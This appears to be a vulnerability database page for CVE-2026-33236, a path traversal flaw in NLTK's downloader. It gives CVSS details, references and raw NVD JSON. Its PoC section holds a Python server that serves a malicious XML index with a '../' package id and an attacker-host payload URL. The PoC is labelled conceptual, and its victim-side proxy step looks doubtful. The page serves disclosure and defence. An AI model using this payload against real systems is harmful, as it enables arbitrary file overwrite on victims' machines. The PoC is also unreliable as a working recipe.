CVE-2026-33236

Description

NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:* - VULNERABLE

NLTK <= 3.9.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Malicious XML Index Server Example (PoC Concept)
# This XML structure demonstrates how to inject path traversal.

import http.server
import socketserver
import xml.etree.ElementTree as ET

PORT = 8000

# Malicious XML payload containing path traversal
MALICIOUS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nltk_data>
    <packages>
        <package id="../../../../tmp/malicious_payload.txt" subdir="corpora">
            <url>http://attacker-server.com/payload.txt</url>
            <checksum type="sha256">dummy_checksum</checksum>
        </package>
    </packages>
</nltk_data>
"""

class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/xml')
        self.end_headers()
        self.wfile.write(MALICIOUS_XML.encode('utf-8'))
        print("[+] Sent malicious XML index to victim.")

with socketserver.TCPServer(("", PORT), MaliciousHandler) as httpd:
    print(f"[+] Malicious server running at port {PORT}")
    print("[+] Configure NLTK to use this server as an index and trigger download.")
    httpd.serve_forever()

# Victim Side (Conceptual)
# import nltk
# nltk.set_proxy('http://127.0.0.1:8000/index.xml')
# nltk.download('malicious_payload') # Triggers the traversal

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33236
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33236
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33236/
[4] VulDB https://vuldb.com/cve/CVE-2026-33236
[5] https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a
[6] https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33236", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:47.007", "lastModified": "2026-03-23T19:15:37.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue."}, {"lang": "es", "value": "NLTK (Natural Language Toolkit) es un conjunto de módulos Python de código abierto, conjuntos de datos y tutoriales que apoyan la investigación y el desarrollo en Procesamiento del Lenguaje Natural. En las versiones 3.9.3 y anteriores, el descargador de NLTK no valida los atributos 'subdir' e 'id' al procesar archivos de índice XML remotos. Los atacantes pueden controlar un servidor de índice XML remoto para proporcionar valores maliciosos que contengan secuencias de salto de ruta (como '../'), lo que puede llevar a la creación arbitraria de directorios, creación arbitraria de archivos y sobrescritura arbitraria de archivos. El commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.9.3", "matchCriteriaId": "E3C35863-7D82-4EEF-BDE8-E94C559CF4FB"}]}]}], "references": [{"url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}